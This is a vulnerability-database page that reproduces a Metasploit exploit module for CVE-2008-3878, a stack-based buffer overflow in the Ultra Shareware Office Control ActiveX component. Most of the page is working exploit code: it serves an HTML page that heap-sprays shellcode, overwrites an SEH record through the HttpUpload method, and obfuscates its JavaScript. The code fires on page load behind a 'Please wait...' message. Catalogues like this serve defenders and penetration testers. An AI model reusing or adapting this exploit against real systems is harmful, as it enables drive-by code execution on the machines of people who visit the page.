Lucene search
K

Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow

🗓️ 04 Mar 2010 06:19:37Reported by shinnai, jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 20 Views

Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow. Stack-based buffer overflow in Ultra Shareware's Office Control. Heap-spray used to get payload into memory unmodified

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-3878
27 Aug 200800:00
circl
CVE
CVE-2008-3878
2 Sep 200815:00
cve
Cvelist
CVE-2008-3878
2 Sep 200815:00
cvelist
Exploit DB
Ultra Shareware Office Control - ActiveX HttpUpload Buffer Overflow (Metasploit)
20 Sep 201000:00
exploitdb
NVD
CVE-2008-3878
2 Sep 200815:41
nvd
OpenVAS
Ultra Office ActiveX Control Multiple Vulnerabilities
2 Sep 200800:00
openvas
OpenVAS
Ultra Office ActiveX Control Multiple Vulnerabilities
2 Sep 200800:00
openvas
Packet Storm
Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
5 Mar 201000:00
packetstorm
Prion
Stack overflow
2 Sep 200815:41
prion
Positive Technologies
PT-2008-5213 · Unknown · Ultra Office Control
2 Sep 200800:00
ptsecurity
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in Ultra Shareware's Office
        Control. When processing the 'HttpUpload' method, the arguments are concatenated
        together to form a command line to run a bundled version of cURL. If the command
        fails to run, a stack-based buffer overflow occurs when building the error
        message. This is due to the use of sprintf() without proper bounds checking.

        NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload
        into memory unmodified.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'shinnai', 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2008-3878' ],
          [ 'OSVDB', '47866' ],
          [ 'BID', '30861' ],
          [ 'EDB', '6318' ]
        ],
      'Payload'        =>
        {
          'Space'    => 4096,
          'BadChars' => "\x00",
          # For HttpUpload args: "\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested with ActiveX v2.0.0.1020 and v2.0.2008.801
          [ 'Windows Universal',
            {
              'Ret' => 0x0c0c0c0c  # heap sprayed
              # 0x746C15A9 # p/p/r in msls31.dll
              # EEK, Safe SEH! 0x220118c2  # p/p/r in OfficeCtrl.ocx
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2008-08-27'))
  end

  def autofilter
    false
  end

  def check_dependencies
    use_zlib
  end

  def on_request_uri(cli, request)

    # ActiveX parameters
    progid = "Ultra.OfficeControl"
    clsid = "00989888-BB72-4E31-A7C6-5F819C24D2F7"

    # Set parameters
    fnname = rand_text_alpha(8+rand(8))
    arg1 = rand_text_alphanumeric(128)
    arg2 = rand_text_alphanumeric(4096) * 10
    seh_offset = 252

    # Build the exploit buffer
    sploit = rand_text_alphanumeric(seh_offset)
    sploit << generate_seh_record(target.ret)

    # Encode variables
    sploit = Rex::Text.to_hex(sploit, '%')
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Prepare the heap spray parameters
    spray_addr = target.ret
    spray_num = "0x%x" % spray_addr

    # Generate the final javascript
    js = %Q|
function #{fnname}()
{
try {
var obj = new ActiveXObject("#{progid}");
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
var arg1 = my_unescape("#{arg1}");
var arg2 = my_unescape("#{arg2}");
var sploit = my_unescape("#{sploit}");
obj.HttpUpload(arg1, arg2, sploit);
} catch( e ) { window.location = 'about:blank' ; }
}
|

    # Obfuscate the javascript
    opts = {
      'Strings' => true,
      'Symbols' => {
        'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }
      }
    }
    js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
    js.obfuscate(memory_sensitive: true)

    # Build the final HTML
    content = %Q|<html>
<head>
<script language=javascript>
#{js}
</script>
</head>
<body onload="#{fnname}()">
Please wait...
</body>
</html>
|

    print_status("Sending #{self.name}")

    send_response_html(cli, content)

    handler(cli)

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation